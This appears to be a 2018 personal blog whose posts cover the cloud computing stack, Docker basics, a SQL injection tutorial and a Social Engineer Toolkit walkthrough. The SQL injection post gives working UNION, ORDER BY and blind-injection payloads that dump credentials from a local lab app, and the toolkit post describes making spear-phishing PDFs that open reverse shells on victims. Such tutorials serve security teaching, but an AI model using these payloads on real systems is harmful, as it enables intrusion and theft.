Thursday, 1 November 2018

Understanding the Cloud Computing Stack-SaaS_PaaS_IaaS


The Cloud Computing Stack


Cloud Computing is often described as a stack, as a response to the broad range of services built on top of one another

• On-demand self-service. The ability for an end user to sign up and receive services without the long delays that have characterized traditional IT
• Broad network access. Ability to access the service via standard platforms (desktop, laptop, mobile etc)
• Resource pooling. Resources are pooled across multiple customers
• Rapid elasticity. Capability can scale to cope with demand peaks
• Measured Service. Billing is metered and delivered as a utility service

The diagram below depicts the Cloud Computing stack – it shows three distinct categories within Cloud Computing: Software as a Service, Platform as a Service and Infrastructure as a Service.

• SaaS applications are designed for end-users, delivered over the web
• PaaS is the set of tools and services designed to make coding and deploying those applications quick and efficient
• IaaS is the hardware and software that powers it all – servers, storage, networks, operating systems
To help understand how these 3 components are related, some have used a transportation analogy;
By itself, infrastructure isn’t useful - it just sits there waiting for someone to make it productive in solving a particular problem. Imagine the Interstate transportation system in the U.S. Even with all these roads built, they wouldn’t be useful without cars and trucks to transport people and goods. In this analogy, the roads are the infrastructure and the cars and trucks are the platform that sits on top of the infrastructure and transports the people and goods. These goods and people might be considered the software and information in the technical realm.

Infrastructure as a Service


Infrastructure as a Service (IaaS) is a way of delivering Cloud Computing infrastructure – servers, storage, network and operating systems – as an on-demand service. Rather than purchasing servers, software, datacenter space or network equipment, clients instead buy those resources as a fully outsourced service on demand

Characteristics of IaaS

• Resources are distributed as a service
• Allows for dynamic scaling
• Has a variable cost, utility pricing mode
• Generally includes multiple users on a single piece of hardware
There are a plethora of IaaS providers out there from the largest Cloud players like Amazon Web Services and Rackspace to more boutique regional players.

Where IaaS Makes Sense

IaaS makes sense in a number of situations and these are closely related to the benefits that Cloud Computing bring. Situations that are particularly suitable for Cloud infrastructure include;
• Where demand is very volatile – any time there are significant spikes and troughs in terms of demand on the infrastructure
• For new organizations without the capital to invest in hardware
• Where the organization is growing rapidly and scaling hardware would be problematic
• Where there is pressure on the organization to limit capital expenditure and to move to operating expenditure
• For specific line of business, trial or temporary infrastructural needs

Where IaaS May Not be the Best Option

While IaaS provides massive advantages for situations where scalability and quick provisioning are beneficial, there are situations where its limitations may be problematic.
• Where regulatory compliance makes the offshoring or outsourcing of data storage and processing difficult
• Where the highest levels of performance are required, and on-premise or dedicated hosted infrastructure has the capacity to meet the organization’s needs

By:- Mr.L1nxr00t

Sunday, 21 October 2018

SQL Injection

Introduction:-

With help of “UNION” operator and “ORDER BY” clause and attacker is able to dump the entire database from the web application vulnerable to SQL injection.
                                                                        
                                                                                                     Attacker                 Form
  1. App sends form to user.
  2. Attacker submits a form with SQL exploit data.
  3. Application builds string with exploit data.
  4. Application sends SQL query to DB.
  5. DB executes query, including exploit, sends data back to application.
  6. Application returns data to user.


Injecting into SELECT

Most common SQL entry point.
SELECT columns
  FROM table
  WHERE expression
  ORDER BY expression
Places where user input is inserted:
WHERE expression
ORDER BY expression
Table or column names

UNION
Combines SELECTs into one result.
SELECT cols FROM table WHERE expr
UNION
SELECT cols2 FROM table2 WHERE expr2
Allows attacker to read any table
‘user’ UNION SELECT number FROM cc--
Requirements
Results must have same number and type of columns.
Attacker needs to know name of other table.
DB returns results with column names of 1st query.

Finding #columns with NULL
‘ UNION SELECT NULL--
‘ UNION SELECT NULL, NULL--
‘ UNION SELECT NULL, NULL, NULL--
Finding #columns with ORDER BY
‘ ORDER BY 1--
‘ ORDER BY 2--
‘ ORDER BY 3--
Finding a string column to extract data
‘ UNION SELECT ‘a’, NULL, NULL—
‘ UNION SELECT NULL, ‘a’, NULL--
‘ UNION SELECT NULL, NULL, ‘a’--


Inference Attacks

Problem: What if app doesn’t print data?
Injection can produce detectable behavior
Successful or failed web page.
Noticeable time delay or absence of delay.
Identify an exploitable URL
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1 and 1=1
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1 and 1=2
Use condition to identify one piece of data
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2
... or use binary search technique ...
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5


You can also specify column number instead of column name.
Sample:
SELECT * FROM users order by 2
Result:

Id  Name
1 Malik
2 John
3 David

INFORMATION_SCHEMA

1. Information database stores information about all the other databases that the MySQL server maintains.

Getting Information from Information_Schema database:

select * from information_schema.tables

Listing only tables of currently selected database.

Select table_name from information_schema.tables where table_schema=database()

Here we can get all column of specific database.

Select column_name from information_schema.columns where table_name=’users’


Web page:
}Here, we have a page that displays post contents based on a given ID.
}When Id is equal to “1”. It displays the following content.
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1
Display:-
Subject
First Post
Messaged by
Admin

}When Id is equal to “2”. It displays the following content.
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2
Display:-
Subject
Second Post
Messaged by
Admin

}We already know, UNION operator only works if the number of columns are equal.
}So, we need tyo find the number of columns that is currently being Selected.
}To achieve that, we will be using “ORDER BY” clause.



Finding number of columns:
Order by 1
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 1
Some message will be displayed…
Order by 2
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 2
Some message will be displayed…
Order by 3
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 3
Some message will be displayed…
Order by 4
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 4
Some message will be displayed…
Order by 5
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 5
You will get an error message, unknown column name ‘5’ in order clause.

}When we try to send “ORDER BY 5’ query, we are getting ‘unknown column’ error message.
}It indicates results of the SELECT statement has only ‘4’ columns.
}Then use the UNION to execute our own SELECT statement.
}

Display message:-

Subject  3
Messaged by 4

Getting MySQL username:
Request:
Example:
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union  select 1,2,user(),4

Display message:-

Subject  root@localhost
Messaged by 4

Getting List of tables:

Request:
Example:
Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union
select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()

Display message:-
Subject cards,fileslist,form_post,messages,tdata,user_master,usermessages
Messaged by4

Dumping Data:
Let’s  dump username, passwords from the 'user_master'  table
Request:

}Http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union select 1,2,group_concat(username,':',password),4 from  user_master


Subject admin:supadmin,developer:developer,tester:tester,teamlead:teamlead,manager:manager,director:director
Messaged by                        4


Blind Injection:

Blind SQL Injection is a type of SQL injection vulnerability in which web application will be vulnerable to SQL Injection but results of Injection won’t be displayed.

Boolean based blind SQL Injection:
}By sending true or false queries to the server, an attacker is able to compromise the entire database.
}By compromising the response to the True query with the response to the False query, an attacker can do Blind SQL injection.

Boolean operator

1=1 à true

1=2 à false



To download file:

http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=2 and 1=1



Determining database server version:


1. Checking whether database server version is 4.x

http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=4


Display message:

File not found


2. Checking whether database server version is 5.x

http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=5

database version=5 then PDF file will be downloaded.

Determining length of Database name:

http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=x

x- length of database name

1. checking database name length is 1

http:// localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=1

Display message:

File not found

2. checking database name length is 3

localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=3

Display message:

File not found

3. checking database name length is 6

localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=6

database name length=6 then PDF file will be downloaded.

Determining first character of Database name:

localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’x’

Here, x is First character of database name

1. checking whether database first character is ‘a’

http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database())=’a’

Display message:

Oops, Something Went wrong


2. checking whether database first character is ‘b’


http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’b’

Display message:

File not found


3. checking whether database first character is ‘b’

http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)=’h’

database name first letter is ‘h’ then Pdf file will be downloaded.

Like wise we can get 2nd , 3rd , 4th , 5th and 6th letters. Because total length of database name is 6.

An successful exploitation , attacker can get database name(hackdb).
}

How does this prevent an attack?
  • The SQL statement you pass to prepare is parsed and compiled by the database server. 
  • By specifying parameters (either a ? or a named parameter like :name) you tell the database engine what to filter on. 
  • Then when you call execute the prepared statement is combined with the parameter values you specify. 
  • It works because the parameter values are combined with the compiled statement, not a SQL string. 
  • SQL injection works by tricking the script into including malicious strings when it creates SQL to send to the database. So by sending the actual SQL separately from the parameters, you limit the risk of ending up with something you didn't intend. 

By:-Mr.L!nxr00t

Social Engineer Toolkit – Penetration Testing Through Social Engineering

Social Engineer Toolkit (SET) is an open source toolkit used for penetration testing via social engineering. The toolkit includes a number of social engineering techniques, such as spear phishing, website attack vectors, Arduino-based attack, wireless access point attack, infection media technique, custom payloads, SMS spoofing, powershell attack, QRCode generated attack, and third party module attacks.

Installing the Social Engineer Toolkit 

Social Engineer Toolkit requires the following packages as a pre-requisite. Install these packages in the following format.

apt-get --force-yes -y install git apache2 python-requests libapache2-mod-php \ python-pymssql build-essential python-pexpect python-pefile python-crypto python-openssl

 After installing the dependencies, clone the SET repository from Github using the following command.

git clone https://github.com/trustedsec/social-engineertoolkit/ set/

The above command clones the SET in a folder called set. Move to the set folder to run the setup.py file using the following commands to complete the installation process.


cd set 
python setup.py install

How to Use Social Engineer Toolkit

Social Engineer Toolkit (SET) can be set into action by typing the following command.

#setoolkit 
The above command launches the toolkit with the following menu.  


The first option in the menu contains all the social engineering techniques that can be used according to the scenario. The complete list of techniques can be seen in the following screenshot.

Each social engineering technique has different attack options. For instance, if we select the Website attack vector from the list; we see different attacking methods, such as Java Applet attack method, Metasploit Browser Exploit method, Credential harvester, Webjacking attack, HTA attack, and multi attack method. The Java applet attack method uses the spoofed Java certificate and Metasploit payload. Browser exploit method makes use of an iframes. In the Webjacking attack method, a genuine link is shown to the user that, when clicked, is replaced with a malicious link. The HTA attack method involves cloning of the website in order to execute the powershell injection via HTA files. In the multi attack method, one can launch the combination of these attacks.

Similarly, if we opt for spear phishing attack vector, we see two main attack options as shown in the following screenshot.

Selecting the first option allows the user to use automatic payload options. The second option allows building the custom payloads for the spear phishing attack. If we select the first option, we see a number of email payloads that can be used in the attack.

For instance, we select an Adobe payload option from the list; we see different options of spawning the shell into the victim’s machine as shown in the following screenshot.

After selecting the desired reverse shell, fill the IP address (or a URL) and port
number details to be used as an interface to listen on the victim’s machine. Once all these details are provided, the tool starts generating the payload. 


Once the payload is generated, it is stored in a pdf folder in the directory with default (template.pdf) name. We can rename this to anything else or leave it as a default. The final step is sending the payload file to the victim(s). There are two options i-e sending the payload to a single email address or sending it to many people. Selecting the desired option takes the user to the next option of selecting the email template as shown in the following screenshot.

Select the desired template option from the list and the target email id. The tool also requires the sender email id in order to send the payload to the victim. If the victim clicks on the link in the email, a connection is created between the victim and attacker’s machine, allowing the attacker to execute the desired commands on the target machine, taking control of the machine. 

Conclusion Social Engineer Toolkit (SET) is a great tool for generating custom and built-in payloads to be used in different social engineering attack vectors. The toolkit allows the red team to gain Remote Command Execution (RCE) over the victim’s machine through reverse shells.

Written by:- Mr.L!nxr00t

Sunday, 7 October 2018

Basic Usage of Docker

In This Section, I will show how to download a docker image, build a container and how to access the container.

1- To create a new container, choosing a base image with the OS- ubuntu or centos or another. Search for a base image with the docker search command.

[root@docker-server ~]# docker search ubuntu
This command will show you all ubuntu images.

2- Now Download the base image to our server

[root@docker-server ~]# docker pull ubuntu

This command downloads an image to your server from docker registry/DockerHub.

3- Check the Downloaded images.

[root@docker-server ~]# docker images


4- Remove Docker Images

[root@docker-server ~]# docker rmi    <REPOSITRY Name /IMAGE ID >

5- Launch New Container with Image.

[root@docker-server ~]# docker run -i -t ubuntu:16.04 /bin/bash


The above command is divided as follows:

-i            is used to start an interactive session.
-t           allocates a tty and attaches stdin and stdout.

ubuntu:16.04 is the image that we used to create the container.
bash (or /bin/bash) is the command that we are running inside the Ubuntu container.


Note- The container will stop when you leave it with the command exit. If you like to have a container that is running in the background, you just need to add the -d option in the command

or

To exit from docker container type CTRL + P + Q. This will leave container running in background an provide you host system console.

[root@docker-server ~]# docker run -i -t --name=Server-Linux02 -d  ubuntu:16.04 /bin/bash


6- Now you can see the container running in the background by using command

[root@docker-server ~]# docker ps


7- Access the shell of container that runs in the background mode

[root@docker-server ~]# docker exec -i -t 5c54131e9883 /bin/bash


Other e.q.

Update system-

[root@docker-server ~]# docker exec e18de3b27825 apt-get update

Install Apache Package-
[root@docker-server ~]# docker exec e18de3b27825 apt-get install apache2 -y


8- To list all containers (including stopped container) use following command.

[root@docker-server ~]# docker ps -a


9- Start/Stop Container

#  docker stop <CONTAINER ID>
#  docker start <CONTAINER ID>


10- Remove The Container
If you like to remove the container, stop it first and then remove it with the command.

[root@docker-server ~]# docker rm <CONTAINER ID>


11- Run Apache inside Docker container and access apache Server

[root@docker-server ~]# docker run -i -t -d --name Apche-Server01 -p 81:80 ubuntu:16.04

( -p option exposes the host port to container port. )

[root@docker-server ~]# docker ps
[root@docker-server ~]# docker exec 8f5e22f73e10 apt-get update
[root@docker-server ~]# docker exec 8f5e22f73e10 apt-get install apache2 -y
[root@docker-server ~]# docker exec 8f5e22f73e10 service apache2 start
[root@docker-server ~]# docker exec 8f5e22f73e10 service apache2 status

In order to visit the page served by the Apache2 container, open a browser from a remote location in your LAN and type the IP address of your machine using the HTTP protocol.


12- View Logs for a Docker Container [root@docker-server ~]# docker logs <Containe ID>

13- Rename Docker Container

[root@docker-server ~]# docker rename <Old_Name>      <New_Name>